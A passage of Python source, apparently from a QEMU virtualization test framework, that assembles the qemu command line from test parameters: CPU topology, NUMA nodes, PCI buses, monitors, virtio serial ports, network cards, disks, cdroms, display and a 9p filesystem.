cmd += _add_option("driftfix", params.get("rtc_drift", None))
return cmd
elif devices.has_option("rtc-td-hack"):
return " -rtc-td-hack"
else:
return ""
def add_kernel_cmdline(cmdline):
return " -append '%s'" % cmdline
def add_testdev(devices, filename=None):
if devices.has_device("testdev"):
return (" -chardev file,id=testlog,path=%s"
" -device testdev,chardev=testlog" % filename)
elif devices.has_device("pc-testdev"):
return " -device pc-testdev"
else:
return ""
def add_isa_debug_exit(devices, iobase=0xf4, iosize=0x04):
if devices.has_device("isa-debug-exit"):
return (" -device isa-debug-exit,iobase=%s,iosize=%s" %
(iobase, iosize))
else:
return ""
def add_no_hpet(devices):
if devices.has_option("no-hpet"):
return " -no-hpet"
else:
return ""
def add_cpu_flags(devices, cpu_model, flags=None, vendor_id=None,
family=None):
if devices.has_option('cpu'):
cmd = " -cpu '%s'" % cpu_model
if vendor_id:
cmd += ",vendor=\"%s\"" % vendor_id
if flags:
if not flags.startswith(","):
cmd += ","
cmd += "%s" % flags
if family is not None:
cmd += ",family=%s" % family
return cmd
else:
return ""
def add_boot(devices, boot_order, boot_once, boot_menu, boot_strict):
if params.get('machine_type', "").startswith("arm"):
logging.warn("-boot on ARM is usually not supported, use "
"bootindex instead.")
return ""
if params.get('machine_type', "").startswith("s390"):
logging.warn("-boot on s390x only support boot strict=on")
return "-boot strict=on"
cmd = " -boot"
patterns = ["order", "once", "menu", "strict"]
options = []
for p in patterns:
pattern = "boot .*?(\[,?%s=(.*?)\]|\s+)" % p
if devices.has_option(pattern):
option = locals()["boot_%s" % p]
options.append("%s=%s" % (p, option))
if devices.has_option("boot \[a\|c\|d\|n\]"):
cmd += " %s" % boot_once
elif options:
cmd += " %s" % ",".join(options)
else:
cmd = ""
return cmd
def get_index(index):
while self.index_in_use.get(str(index)):
index += 1
return index
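# Illustrative get_index() behavior (a sketch): with
# self.index_in_use == {"0": True, "1": True}, get_index(0)
# returns 2, the first free drive index.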
def add_sga(devices):
if not devices.has_option("device"):
return ""
else:
return " -device sga"
def add_watchdog(devices, device_type=None, action="reset"):
watchdog_cmd = ""
if devices.has_option("watchdog"):
if device_type:
watchdog_cmd += " -watchdog %s" % device_type
watchdog_cmd += " -watchdog-action %s" % action
return watchdog_cmd
def add_option_rom(devices, opt_rom):
if not devices.has_option("option-rom"):
return ""
return " -option-rom %s" % opt_rom
def add_smartcard(sc_chardev, sc_id):
sc_cmd = " -device usb-ccid,id=ccid0"
sc_cmd += " -chardev " + sc_chardev
sc_cmd += ",id=" + sc_id + ",name=smartcard"
sc_cmd += " -device ccid-card-passthru,chardev=" + sc_id
return sc_cmd
def add_numa_node(devices, memdev=None, mem=None,
cpus=None, nodeid=None):
"""
This function is used to add numa node to guest command line
"""
if not devices.has_option("numa"):
return ""
numa_cmd = " -numa node"
if mem is not None:
numa_cmd += ",mem=%s" % mem
elif memdev is not None:
numa_cmd += ",memdev=%s" % memdev
if cpus is not None:
cpus = map(lambda x: x.strip(), cpus.split(','))
cpus = ','.join(map(lambda x: "cpus=%s" % x, cpus))
numa_cmd += ",%s" % cpus
if nodeid is not None:
numa_cmd += ",nodeid=%s" % nodeid
return numa_cmd
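# Illustrative add_numa_node() output (a sketch):
# add_numa_node(devices, mem=1024, cpus="0,1", nodeid=0) returns
#   " -numa node,mem=1024,cpus=0,cpus=1,nodeid=0"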
def add_balloon(devices, devid=None, bus=None, use_old_format=None):
"""
This function is used to add balloon device
"""
if not devices.has_option("device") or use_old_format is True:
devices.insert(StrDev('balloon', cmdline=" -balloon virtio"))
return
machine_type = self.params.get("machine_type")
if "s390" in machine_type: # For s390x platform
model = "virtio-balloon-ccw"
bus = {'type': 'virtio-bus'}
else:
model = "virtio-balloon-pci"
dev = QDevice(model, parent_bus=bus)
if devid:
dev.set_param("id", devid)
devices.insert(dev)
def add_disable_legacy(devices, dev, dev_type):
"""
This function is used to add disable_legacy option for virtio-pci
"""
options = devices.execute_qemu("-device %s,?" % dev_type)
if "disable-legacy" in options:
value = params.get("disable_legacy", "off")
dev.set_param("disable-legacy", value)
def add_disable_modern(devices, dev, dev_type):
"""
This function is used to add disable_modern option for virtio-pci
"""
options = devices.execute_qemu("-device %s,?" % dev_type)
if "disable-modern" in options:
value = params.get("disable_modern", "on")
dev.set_param("disable-modern", value)
def _get_pci_bus(devices, params, dtype=None, virtio=False):
"""
Get device parent pci bus by dtype
:param devices: DevContainer object
:param params: test params
:param dtype: device type
:param virtio: is it a virtio device (bool type)
:return: dict describing the parent pci bus (aobject).
"""
pci_bus = {'aobject': params.get('pci_bus', 'pci.0')}
if params.get("machine_type") != "q35":
return pci_bus
if dtype and "%s_pci_bus" % dtype in params:
return {"aobject": params["%s_pci_bus" % dtype]}
pcic = virtio and "x3130-upstream" or "pci-bridge"
devices = [_ for _ in devices if isinstance(_, QDevice)]
devices = [_ for _ in devices if _.get_param('driver') == pcic]
try:
return {"aobject": devices[0].get_qid()}
except Exception:
pass
return pci_bus
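# Illustrative _get_pci_bus() returns (a sketch): on a non-q35
# machine it returns {'aobject': 'pci.0'} (or the pci_bus param);
# on q35, with e.g. "disk_pci_bus" set in params (hypothetical
# value), dtype "disk" returns {'aobject': params["disk_pci_bus"]}.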
# End of command line option wrappers
# If nothing changed and devices exist, return immediately
if (name is None and params is None and root_dir is None and
self.devices is not None):
return self.devices
if name is None:
name = self.name
if params is None:
params = self.params
if root_dir is None:
root_dir = self.root_dir
have_ahci = False
have_virtio_scsi = False
virtio_scsi_pcis = []
pci_bus = {'aobject': params.get('pci_bus', 'pci.0')}
# Init value by default.
# PCI addrs 0, 1, 2 are taken by the PCI/ISA/IDE bridge and the GPU.
self.pci_addr_list = [0, 1, 2]
# Clone this VM using the new params
vm = self.clone(name, params, root_dir, copy_state=True)
# global counters
ide_bus = 0
ide_unit = 0
vdisk = 0
scsi_disk = 0
self.last_boot_index = 0
if params.get("kernel"):
self.last_boot_index = 1
qemu_binary = utils_misc.get_qemu_binary(params)
self.qemu_binary = qemu_binary
self.qemu_version = commands.getoutput("%s -version" %
qemu_binary).split(',')[0]
support_cpu_model = commands.getoutput("%s -cpu \\?" % qemu_binary)
self.last_driver_index = 0
# init the dict index_in_use
for key in params.keys():
if 'drive_index' in key:
self.index_in_use[params.get(key)] = True
cmd = ""
# Enable the use of glibc's malloc_perturb feature
if params.get("malloc_perturb", "no") == "yes":
cmd += "MALLOC_PERTURB_=1 "
# Set the X11 display parameter if requested
if params.get("x11_display"):
cmd += "DISPLAY=%s " % params.get("x11_display")
if params.get("qemu_audio_drv"):
cmd += "QEMU_AUDIO_DRV=%s " % params.get("qemu_audio_drv")
# Add command prefix for qemu-kvm, like taskset, valgrind and so on
if params.get("qemu_command_prefix"):
qemu_command_prefix = params.get("qemu_command_prefix")
cmd += "%s " % qemu_command_prefix
# Add numa memory cmd to pin guest memory to numa node
if params.get("numa_node"):
numa_node = int(params.get("numa_node"))
if len(utils_misc.get_node_cpus()) < int(params.get("smp", 1)):
logging.info("Skip pinning, no enough nodes")
elif numa_node < 0:
n = utils_misc.NumaNode(numa_node)
cmd += "numactl -m %s " % n.node_id
else:
n = numa_node - 1
cmd += "numactl -m %s " % n
# Start constructing devices representation
devices = qcontainer.DevContainer(qemu_binary, self.name,
params.get('strict_mode'),
params.get(
'workaround_qemu_qmp_crash'),
params.get('allow_hotplugged_vm'))
StrDev = qdevices.QStringDevice
QDevice = qdevices.QDevice
devices.insert(StrDev('PREFIX', cmdline=cmd))
# Add the qemu binary
devices.insert(StrDev('qemu', cmdline=qemu_binary))
devices.insert(StrDev('-S', cmdline="-S"))
# Add the VM's name
devices.insert(StrDev('vmname', cmdline=add_name(name)))
qemu_sandbox = params.get("qemu_sandbox")
if qemu_sandbox == "on":
devices.insert(
StrDev(
'qemu_sandbox',
cmdline=process_sandbox(
devices,
"add")))
elif qemu_sandbox == "off":
devices.insert(
StrDev(
'qemu_sandbox',
cmdline=process_sandbox(
devices,
"rem")))
del qemu_sandbox
devs = devices.machine_by_params(params)
devices.insert(devs)
# no automagic devices please
defaults = params.get("defaults", "no")
if devices.has_option("nodefaults") and defaults != "yes":
devices.insert(StrDev('nodefaults', cmdline=" -nodefaults"))
# nodefconfig please
if params.get("defconfig", "yes") == "no":
devices.insert(StrDev('nodefconfig', cmdline=" -nodefconfig"))
vga = params.get("vga")
if vga:
if vga != 'none':
devices.insert(StrDev('VGA-%s' % vga,
cmdline=add_vga(vga),
parent_bus={'aobject': 'pci.0'}))
if vga == 'qxl':
qxl_dev_nr = int(params.get("qxl_dev_nr", 1))
if qxl_dev_nr > 1:
addr = int(params.get("qxl_base_addr", 29))
cmdline = add_qxl(qxl_dev_nr, addr)
devices.insert(StrDev('qxl', cmdline=cmdline))
else:
devices.insert(StrDev('VGA-none', cmdline=add_vga(vga)))
elif params.get('defaults', 'no') != 'no': # by default add cirrus
devices.insert(StrDev('VGA-cirrus',
cmdline=add_vga(vga),
parent_bus={'aobject': 'pci.0'}))
# When the old scsi fmt is used, a new device with the lowest pci_addr is created
devices.hook_fill_scsi_hbas(params)
# Additional PCI RC/switch/bridges
for pcic in params.objects("pci_controllers"):
devs = devices.pcic_by_params(pcic, params.object_params(pcic))
devices.insert(devs)
# -soundhw addresses are always the lowest after scsi
soundhw = params.get("soundcards")
if soundhw:
parent_bus = _get_pci_bus(devices, params, "soundcard")
if not devices.has_option('device') or soundhw == "all":
for sndcard in ('AC97', 'ES1370', 'intel-hda'):
# Add all dummy PCI devices and the actual command below
devices.insert(StrDev("SND-%s" % sndcard,
parent_bus=parent_bus))
devices.insert(StrDev('SoundHW',
cmdline="-soundhw %s" % soundhw))
else:
# TODO: Use QDevices for this and set the addresses properly
for sound_device in soundhw.split(","):
if "hda" in sound_device:
devices.insert(QDevice('intel-hda',
parent_bus=parent_bus))
devices.insert(QDevice('hda-duplex'))
elif sound_device in ["es1370", "ac97"]:
devices.insert(QDevice(sound_device.upper(),
parent_bus=parent_bus))
else:
devices.insert(QDevice(sound_device,
parent_bus=parent_bus))
# Add monitors
catch_monitor = params.get("catch_monitor")
if catch_monitor:
if catch_monitor not in params.get("monitors"):
params["monitors"] += " %s" % catch_monitor
for monitor_name in params.objects("monitors"):
monitor_params = params.object_params(monitor_name)
monitor_filename = qemu_monitor.get_monitor_filename(vm,
monitor_name)
if monitor_params.get("monitor_type") == "qmp":
cmd = add_qmp_monitor(devices, monitor_name,
monitor_filename)
devices.insert(StrDev('QMP-%s' % monitor_name, cmdline=cmd))
else:
cmd = add_human_monitor(devices, monitor_name,
monitor_filename)
devices.insert(StrDev('HMP-%s' % monitor_name, cmdline=cmd))
# Add pvpanic device
if params.get("enable_pvpanic") == "yes":
if not devices.has_device("pvpanic"):
logging.warn("pvpanic device is not supportted")
else:
pvpanic_params = {"backend": "pvpanic"}
ioport = params.get("ioport_pvpanic")
if ioport:
pvpanic_params["ioport"] = ioport
pvpanic_dev = qdevices.QCustomDevice("device",
params=pvpanic_params,
backend="backend")
pvpanic_dev.set_param("id", utils_misc.generate_random_id(),
dynamic=True)
devices.insert(pvpanic_dev)
# Add serial console redirection
for serial in params.objects("serials"):
serial_filename = vm.get_serial_console_filename(serial)
cmd = add_serial(devices, serial, serial_filename)
devices.insert(StrDev('SER-%s' % serial, cmdline=cmd))
# Add virtio_serial ports
if not devices.has_device("virtconsole"):
logging.warn("virt-console/serialport devices are not supported")
else:
no_virtio_serial_pcis = 0
no_virtio_ports = 0
virtio_port_spread = int(params.get('virtio_port_spread', 2))
parent_bus = _get_pci_bus(devices, params, "vio_port", True)
for port_name in params.objects("virtio_ports"):
port_params = params.object_params(port_name)
bus = params.get('virtio_port_bus', False)
if bus is not False: # Manually set bus
bus = int(bus)
elif not virtio_port_spread:
# bus not specified, let qemu decide
pass
elif not no_virtio_ports % virtio_port_spread:
# Add new vio-pci every n-th port. (Spread ports)
bus = no_virtio_serial_pcis
else: # Port not overridden, use last vio-pci
bus = no_virtio_serial_pcis - 1
if bus < 0: # First bus
bus = 0
# Add virtio_serial_pcis
# Multiple virtio console devices can't share a
# single virtio-serial-pci bus. So add a virtio-serial-pci bus
# when the port is a virtio console.
if (port_params.get('virtio_port_type') == 'console' and
params.get('virtio_port_bus') is None):
if params.get('machine_type').startswith("arm64-mmio"):
dev = QDevice('virtio-serial-device')
else:
dev = QDevice(
'virtio-serial-pci', parent_bus=parent_bus)
dev.set_param('id',
'virtio_serial_pci%d' % no_virtio_serial_pcis)
devices.insert(dev)
no_virtio_serial_pcis += 1
for i in range(no_virtio_serial_pcis, bus + 1):
if params.get('machine_type').startswith("arm64-mmio"):
dev = QDevice('virtio-serial-device')
else:
dev = QDevice(
'virtio-serial-pci', parent_bus=parent_bus)
dev.set_param('id', 'virtio_serial_pci%d' % i)
devices.insert(dev)
no_virtio_serial_pcis += 1
if bus is not False:
bus = "virtio_serial_pci%d.0" % bus
# Add actual ports
char_params = port_params.copy()
backend = port_params.get("virtio_port_chardev", "socket")
port_file = self.get_virtio_port_filename(port_name)
char_params.update({"backend": backend,
"server": "yes",
"nowait": "yes",
"name": port_name,
"path": port_file})
char_dev = add_chardev(devices, char_params)
virtio_port = add_virtio_port(devices,
char_dev,
port_params,
port_name,
bus,
no_virtio_ports)
devices.insert([char_dev, virtio_port])
no_virtio_ports += 1
# Add virtio-rng devices
for virtio_rng in params.objects("virtio_rngs"):
parent_bus = _get_pci_bus(devices, params, "vio_rng", True)
virtio_rng_params = params.object_params(virtio_rng)
add_virtio_rng(devices, virtio_rng_params, parent_bus)
# Add logging
devices.insert(StrDev('isa-log', cmdline=add_log_seabios(devices)))
if params.get("anaconda_log", "no") == "yes":
parent_bus = _get_pci_bus(devices, params, None, True)
add_log_anaconda(devices, parent_bus)
# Add USB controllers
usbs = params.objects("usbs")
if not devices.has_option("device"):
usbs = ("oldusb",) # Old qemu, add only one controller '-usb'
for usb_name in usbs:
usb_params = params.object_params(usb_name)
for dev in devices.usbc_by_params(usb_name, usb_params):
devices.insert(dev)
for iothread in params.get("iothreads", "").split():
cmd = "-object iothread,"
iothread_id = params.get("%s_id" % iothread.strip())
if not iothread_id:
iothread_id = iothread.strip()
cmd += "id=%s" % iothread_id
devices.insert(StrDev("IOthread_%s" % iothread_id, cmdline=cmd))
# Add images (harddrives)
for image_name in params.objects("images"):
# FIXME: Use qemu_devices for handling indexes
image_params = params.object_params(image_name)
if image_params.get("boot_drive") == "no":
continue
if params.get("index_enable") == "yes":
drive_index = image_params.get("drive_index")
if drive_index:
index = drive_index
else:
self.last_driver_index = get_index(self.last_driver_index)
index = str(self.last_driver_index)
self.last_driver_index += 1
else:
index = None
image_bootindex = None
image_boot = image_params.get("image_boot")
if not re.search("boot=on\|off", devices.get_help_text(),
re.MULTILINE):
if image_boot in ['yes', 'on', True]:
image_bootindex = str(self.last_boot_index)
self.last_boot_index += 1
image_boot = "unused"
image_bootindex = image_params.get('bootindex',
image_bootindex)
else:
if image_boot in ['yes', 'on', True]:
if self.last_boot_index > 0:
image_boot = False
self.last_boot_index += 1
if ("virtio" in image_params.get("drive_format", "") or
"virtio" in image_params.get("scsi_hba", "")):
parent_bus = _get_pci_bus(devices, params, "disk", True)
else:
parent_bus = _get_pci_bus(devices, params, "disk", False)
devs = devices.images_define_by_params(image_name, image_params,
'disk', index, image_boot,
image_bootindex,
pci_bus=parent_bus)
for _ in devs:
devices.insert(_)
# Networking
redirs = []
for redir_name in params.objects("redirs"):
redir_params = params.object_params(redir_name)
guest_port = int(redir_params.get("guest_port"))
host_port = vm.redirs.get(guest_port)
redirs += [(host_port, guest_port)]
iov = 0
for nic in vm.virtnet:
nic_params = params.object_params(nic.nic_name)
if nic_params.get('pci_assignable') == "no":
script = nic_params.get("nic_script")
downscript = nic_params.get("nic_downscript")
vhost = nic_params.get("vhost")
vhostforce = nic_params.get("vhostforce")
script_dir = data_dir.get_data_dir()
if script:
script = utils_misc.get_path(script_dir, script)
if downscript:
downscript = utils_misc.get_path(script_dir, downscript)
# setup nic parameters as needed
# add_netdev if netdev_id not set
nic = vm.add_nic(**dict(nic))
# gather set values or None if unset
vlan = int(nic.get('vlan'))
netdev_id = nic.get('netdev_id')
device_id = nic.get('device_id')
mac = nic.get('mac')
nic_model = nic.get("nic_model")
nic_extra = nic.get("nic_extra_params")
bootindex = nic_params.get("bootindex")
netdev_extra = nic.get("netdev_extra_params")
bootp = nic.get("bootp")
add_queues = nic_params.get("add_queues", "no") == "yes"
add_tapfd = nic_params.get("add_tapfd", "no") == "yes"
add_vhostfd = nic_params.get("add_vhostfd", "no") == "yes"
helper = nic_params.get("helper")
tapfds_len = int(nic_params.get("tapfds_len", -1))
vhostfds_len = int(nic_params.get("vhostfds_len", -1))
if nic.get("tftp"):
tftp = utils_misc.get_path(root_dir, nic.get("tftp"))
else:
tftp = None
nettype = nic.get("nettype", "bridge")
# don't force conversion of add_nic()/add_net() optional parameters
if 'tapfds' in nic:
tapfds = nic.tapfds
else:
tapfds = None
if 'vhostfds' in nic:
vhostfds = nic.vhostfds
else:
vhostfds = None
ifname = nic.get('ifname')
queues = nic.get("queues", 1)
# specify the number of MSI-X vectors that the card should have;
# this option currently only affects virtio cards
if nic_params.get("enable_msix_vectors") == "yes":
if "vectors" in nic:
vectors = nic.vectors
else:
vectors = 2 * int(queues) + 2
else:
vectors = None
# Setup some exclusive parameters if we are not running a
# negative test.
if nic_params.get("run_invalid_cmd_nic") != "yes":
if vhostfds or tapfds or add_queues:
helper = None
if vhostfds or tapfds:
add_queues = None
add_vhostfd = None
add_tapfd = None
else:
if vhostfds and vhostfds_len > -1:
vhostfd_list = re.split(":", vhostfds)
if vhostfds_len < len(vhostfd_list):
vhostfds = ":".join(vhostfd_list[:vhostfds_len])
if tapfds and tapfds_len > -1:
tapfd_list = re.split(":", tapfds)
if tapfds_len < len(tapfd_list):
tapfds = ":".join(tapfd_list[:tapfds_len])
# Handle the '-net nic' part
virtio = "virtio" in nic_model
parent_bus = _get_pci_bus(devices, params, "nic", virtio)
add_nic(devices, vlan, nic_model, mac,
device_id, netdev_id, nic_extra,
nic_params.get("nic_pci_addr"),
bootindex, queues, vectors, parent_bus,
nic_params.get("ctrl_mac_addr"))
# Handle the '-net tap' or '-net user' or '-netdev' part
cmd, cmd_nd = add_net(devices, vlan, nettype, ifname, tftp,
bootp, redirs, netdev_id, netdev_extra,
tapfds, script, downscript, vhost,
queues, vhostfds, add_queues, helper,
add_tapfd, add_vhostfd, vhostforce)
if vhostfds is None:
vhostfds = ""
if tapfds is None:
tapfds = ""
net_params = {'netdev_id': netdev_id,
'vhostfd': vhostfds.split(":")[0],
'vhostfds': vhostfds,
'tapfd': tapfds.split(":")[0],
'tapfds': tapfds,
'ifname': ifname,
}
for i, (host_port, guest_port) in enumerate(redirs):
net_params["host_port%d" % i] = host_port
net_params["guest_port%d" % i] = guest_port
# TODO: Is every NIC a PCI device?
devices.insert(StrDev("NET-%s" % nettype, cmdline=cmd,
params=net_params, cmdline_nd=cmd_nd))
else:
device_driver = nic_params.get("device_driver", "pci-assign")
pci_id = vm.pa_pci_ids[iov]
pci_id = ":".join(pci_id.split(":")[1:])
add_pcidevice(devices, pci_id, params=nic_params,
device_driver=device_driver,
pci_bus=pci_bus)
iov += 1
# Add Memory devices
add_memorys(devices, params)
smp = int(params.get("smp", 0))
mem = int(params.get("mem", 0))
vcpu_maxcpus = int(params.get("vcpu_maxcpus", 0))
vcpu_sockets = int(params.get("vcpu_sockets", 0))
vcpu_cores = int(params.get("vcpu_cores", 0))
vcpu_threads = int(params.get("vcpu_threads", 0))
# Some versions of Windows don't support more than 2 CPU sockets;
# as a workaround, make all Windows guests use only 2 sockets.
if (vcpu_sockets and vcpu_sockets > 2 and
params.get("os_type") == 'windows'):
vcpu_sockets = 2
amd_vendor_string = params.get("amd_vendor_string")
if not amd_vendor_string:
amd_vendor_string = "AuthenticAMD"
if amd_vendor_string == utils_misc.get_cpu_vendor():
# AMD CPUs do not support multiple threads.
if params.get("test_negative_thread", "no") != "yes":
vcpu_threads = 1
txt = "Set vcpu_threads to 1 for AMD CPUs."
logging.warn(txt)
if smp == 0 or vcpu_sockets == 0:
vcpu_cores = vcpu_cores or 1
vcpu_threads = vcpu_threads or 1
if smp and vcpu_sockets == 0:
vcpu_sockets = int(smp / (vcpu_cores * vcpu_threads)) or 1
else:
vcpu_sockets = vcpu_sockets or 1
if smp == 0:
smp = vcpu_cores * vcpu_threads * vcpu_sockets
else:
if vcpu_cores == 0:
vcpu_threads = vcpu_threads or 1
vcpu_cores = int(smp / (vcpu_sockets * vcpu_threads)) or 1
else:
vcpu_threads = int(smp / (vcpu_cores * vcpu_sockets)) or 1
self.cpuinfo.smp = smp
self.cpuinfo.maxcpus = vcpu_maxcpus or smp
self.cpuinfo.cores = vcpu_cores
self.cpuinfo.threads = vcpu_threads
self.cpuinfo.sockets = vcpu_sockets
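# Worked example of the topology fixup above (illustrative): with
# smp=4, vcpu_sockets=0, vcpu_cores=2 and vcpu_threads=0, threads
# defaults to 1 and sockets is computed as 4 / (2 * 1) = 2, so
# add_smp() below emits " -smp 4,maxcpus=4,cores=2,threads=1,sockets=2".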
devices.insert(StrDev('smp', cmdline=add_smp(devices)))
numa_total_cpus = 0
numa_total_mem = 0
for numa_node in params.objects("guest_numa_nodes"):
numa_params = params.object_params(numa_node)
numa_mem = numa_params.get("numa_mem")
numa_cpus = numa_params.get("numa_cpus")
numa_nodeid = numa_params.get("numa_nodeid")
numa_memdev = numa_params.get("numa_memdev")
if numa_mem is not None:
numa_total_mem += int(numa_mem)
if numa_cpus is not None:
numa_total_cpus += len(utils_misc.cpu_str_to_list(numa_cpus))
cmdline = add_numa_node(devices, numa_memdev,
numa_mem, numa_cpus, numa_nodeid)
devices.insert(StrDev('numa', cmdline=cmdline))
if params.get("numa_consistency_check_cpu_mem", "no") == "yes":
if (numa_total_cpus > int(smp) or numa_total_mem > int(mem) or
len(params.objects("guest_numa_nodes")) > int(smp)):
logging.debug("-numa need %s vcpu and %s memory. It is not "
"matched the -smp and -mem. The vcpu number "
"from -smp is %s, and memory size from -mem is"
" %s" % (numa_total_cpus, numa_total_mem, smp,
mem))
raise virt_vm.VMDeviceError("The numa node cfg can not fit"
" smp and memory cfg.")
cpu_model = params.get("cpu_model")
use_default_cpu_model = True
if cpu_model:
use_default_cpu_model = False
for model in re.split(",", cpu_model):
model = model.strip()
if model not in support_cpu_model:
continue
cpu_model = model
break
else:
cpu_model = model
logging.error("Non existing CPU model %s will be passed "
"to qemu (wrong config or negative test)", model)
if use_default_cpu_model:
cpu_model = params.get("default_cpu_model")
if cpu_model:
vendor = params.get("cpu_model_vendor")
flags = params.get("cpu_model_flags")
family = params.get("cpu_family")
self.cpuinfo.model = cpu_model
self.cpuinfo.vendor = vendor
self.cpuinfo.flags = flags
self.cpuinfo.family = family
cmd = add_cpu_flags(devices, cpu_model, flags, vendor, family)
devices.insert(StrDev('cpu', cmdline=cmd))
# Add cdroms
for cdrom in params.objects("cdroms"):
image_params = params.object_params(cdrom)
# FIXME: Use qemu_devices for handling indexes
if image_params.get("boot_drive") == "no":
continue
if params.get("index_enable") == "yes":
drive_index = image_params.get("drive_index")
if drive_index:
index = drive_index
else:
self.last_driver_index = get_index(self.last_driver_index)
index = str(self.last_driver_index)
self.last_driver_index += 1
else:
index = None
image_bootindex = None
image_boot = image_params.get("image_boot")
if not re.search("boot=on\|off", devices.get_help_text(),
re.MULTILINE):
if image_boot in ['yes', 'on', True]:
image_bootindex = str(self.last_boot_index)
self.last_boot_index += 1
image_boot = "unused"
image_bootindex = image_params.get(
'bootindex', image_bootindex)
else:
if image_boot in ['yes', 'on', True]:
if self.last_boot_index > 0:
image_boot = False
self.last_boot_index += 1
iso = image_params.get("cdrom")
if iso or image_params.get("cdrom_without_file") == "yes":
if ("virtio" in image_params.get("driver_format", "") or
"virtio" in image_params.get("scsi_hba", "")):
parent_bus = _get_pci_bus(devices, params, "cdrom", True)
else:
parent_bus = _get_pci_bus(devices, params, "cdrom", False)
devs = devices.cdroms_define_by_params(cdrom, image_params,
'cdrom', index,
image_boot,
image_bootindex,
pci_bus=parent_bus)
for _ in devs:
devices.insert(_)
# We may want to add a {floppy_opts} parameter for -fda, -fdb
# {fat:floppy:}/path/. However vvfat is not usually recommended.
for floppy_name in params.objects('floppies'):
image_params = params.object_params(floppy_name)
# TODO: Unify image, cdrom, floppy params
image_params['drive_format'] = 'floppy'
image_params[
'image_readonly'] = image_params.get("floppy_readonly",
"no")
# Use the absolute path with floppies (pure *.vfd)
image_params['image_raw_device'] = 'yes'
image_params['image_name'] = utils_misc.get_path(
data_dir.get_data_dir(),
image_params["floppy_name"])
image_params['image_format'] = None
devs = devices.images_define_by_params(floppy_name, image_params,
media='')
for _ in devs:
devices.insert(_)
# Add usb devices
for usb_dev in params.objects("usb_devices"):
usb_dev_params = params.object_params(usb_dev)
devices.insert(devices.usb_by_params(usb_dev, usb_dev_params))
tftp = params.get("tftp")
if tftp:
tftp = utils_misc.get_path(data_dir.get_data_dir(), tftp)
devices.insert(StrDev('tftp', cmdline=add_tftp(devices, tftp)))
bootp = params.get("bootp")
if bootp:
devices.insert(StrDev('bootp',
cmdline=add_bootp(devices, bootp)))
kernel = params.get("kernel")
if kernel:
kernel = utils_misc.get_path(data_dir.get_data_dir(), kernel)
devices.insert(StrDev('kernel',
cmdline=add_kernel(kernel)))
kernel_params = params.get("kernel_params")
if kernel_params:
cmd = add_kernel_cmdline(kernel_params)
devices.insert(StrDev('kernel-params', cmdline=cmd))
initrd = params.get("initrd")
if initrd:
initrd = utils_misc.get_path(data_dir.get_data_dir(), initrd)
devices.insert(StrDev('initrd',
cmdline=add_initrd(initrd)))
for host_port, guest_port in redirs:
cmd = add_tcp_redir(devices, host_port, guest_port)
devices.insert(StrDev('tcp-redir', cmdline=cmd))
cmd = ""
if params.get("display") == "vnc":
vnc_extra_params = params.get("vnc_extra_params")
vnc_password = params.get("vnc_password", "no")
cmd += add_vnc(self.vnc_port, vnc_password, vnc_extra_params)
elif params.get("display") == "sdl":
cmd += add_sdl(devices)
elif params.get("display") == "nographic":
cmd += add_nographic()
elif params.get("display") == "spice":
if params.get("rhel5_spice"):
spice_params = params.get("spice_params")
cmd += add_spice_rhel5(devices, spice_params)
else:
spice_keys = (
"spice_port", "spice_password", "spice_addr", "spice_ssl",
"spice_tls_port", "spice_tls_ciphers", "spice_gen_x509",
"spice_x509_dir", "spice_x509_prefix",
"spice_x509_key_file", "spice_x509_cacert_file",
"spice_x509_key_password", "spice_x509_secure",
"spice_x509_cacert_subj", "spice_x509_server_subj",
"spice_secure_channels", "spice_image_compression",
"spice_jpeg_wan_compression",
"spice_zlib_glz_wan_compression", "spice_streaming_video",
"spice_agent_mouse", "spice_playback_compression",
"spice_ipv4", "spice_ipv6", "spice_x509_cert_file",
"disable_copy_paste", "spice_seamless_migration",
"listening_addr"
)
for skey in spice_keys:
value = params.get(skey, None)
if value:
self.spice_options[skey] = value
cmd += add_spice()
if cmd:
devices.insert(StrDev('display', cmdline=cmd))
if params.get("uuid") == "random":
cmd = add_uuid(vm.uuid)
devices.insert(StrDev('uuid', cmdline=cmd))
elif params.get("uuid"):
cmd = add_uuid(params.get("uuid"))
devices.insert(StrDev('uuid', cmdline=cmd))
if params.get("testdev") == "yes":
cmd = add_testdev(devices, vm.get_testlog_filename())
devices.insert(StrDev('testdev', cmdline=cmd))
if params.get("isa_debugexit") == "yes":
iobase = params.get("isa_debugexit_iobase")
iosize = params.get("isa_debugexit_iosize")
cmd = add_isa_debug_exit(devices, iobase, iosize)
devices.insert(StrDev('isa_debugexit', cmdline=cmd))
if params.get("disable_hpet") == "yes":
devices.insert(StrDev('nohpet', cmdline=add_no_hpet(devices)))
devices.insert(StrDev('rtc', cmdline=add_rtc(devices)))
if devices.has_option("boot"):
boot_order = params.get("boot_order", "cdn")
boot_once = params.get("boot_once", "c")
boot_menu = params.get("boot_menu", "off")
boot_strict = params.get("boot_strict", "off")
cmd = add_boot(
devices, boot_order, boot_once, boot_menu, boot_strict)
devices.insert(StrDev('bootmenu', cmdline=cmd))
p9_export_dir = params.get("9p_export_dir")
if p9_export_dir:
cmd = " -fsdev"
p9_fs_driver = params.get("9p_fs_driver")
if p9_fs_driver == "handle":
cmd += " handle,id=local1,path=" + p9_export_dir
elif p9_fs_driver == "proxy":
cmd += " proxy,id=local1,socket="
else:
p9_fs_driver = "local"
cmd += " local,id=local1,path=" + p9_export_dir
# security model is needed only for local fs driver
if p9_fs_driver == "local":
p9_security_model = params.get("9p_security_model")
if not p9_security_model:
p9_security_model = "none"
cmd += ",security_model=" + p9_security_model
elif p9_fs_driver == "proxy":
p9_socket_name = params.get("9p_socket_name")
if not p9_socket_name:
raise virt_vm.VMImageMissingError("Socket name not "
"defined")
cmd += p9_socket_name
p9_immediate_writeout = params.get("9p_immediate_writeout")
if p9_immediate_writeout == "yes":
cmd += ",writeout=immediate"
p9_readonly = params.get("9p_readonly")
if p9_readonly == "yes":
cmd += ",readonly"
devices.insert(StrDev('fsdev', cmdline=cmd))
parent_bus = _get_pci_bus(devices, params, 'vio_9p', True)
dev = QDevice('virtio-9p-pci', parent_bus=parent_bus)
dev.set_param('fsdev', 'local1')
dev.set_param('mount_tag', 'autotest_tag')
devices.insert(dev)
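# For the default "local" driver, the options built above would,
# for example (illustrative, assuming 9p_export_dir=/tmp/9p and
# the default security model), expand to roughly:
#   -fsdev local,id=local1,path=/tmp/9p,security_model=none
#   -device virtio-9p-pci,fsdev=local1,mount_tag=autotest_tag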
extra_params = params.get("extra_params")
if extra_params:
devices.insert(StrDev('extra', cmdline=extra_params))
bios_path = params.get("bios_path")
if bios_path:
devices.insert(StrDev('bios', cmdline="-bios %s" % bios_path))
if params.get('ovmf_path'):
